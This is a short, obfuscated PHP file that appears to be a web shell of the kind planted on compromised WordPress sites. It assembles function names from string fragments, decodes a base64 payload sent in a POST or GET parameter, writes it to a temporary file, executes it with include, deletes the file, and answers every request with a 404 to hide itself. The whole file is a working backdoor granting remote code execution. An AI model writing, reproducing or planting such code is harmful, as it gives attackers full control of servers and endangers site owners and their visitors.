<?php
try{
$eaa1bf=array('sys_get_t'.'emp_dir','ba'.'se64_decode','file'.'_put_contents','tempn'.'am','unli'.'nk','array_key'.'_exists');
$hb2d3c='b206'.'98d8';
if($eaa1bf[5]($hb2d3c,$_POST)){
$fbaee9=$eaa1bf[1]($_POST[$hb2d3c]);
}elseif($eaa1bf[5]($hb2d3c,$_GET)){
$fbaee9=$eaa1bf[1]($_GET[$hb2d3c]);
}else{$fbaee9=null;}
if($fbaee9){
$hc8d24=$eaa1bf[3]($eaa1bf[0](),'w'.'p_');
if($hc8d24){
$eaa1bf[2]($hc8d24,'<'.'?ph'.'p '.$fbaee9);
http_response_code(404);
@include_once($hc8d24);
@$eaa1bf[4]($hc8d24);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
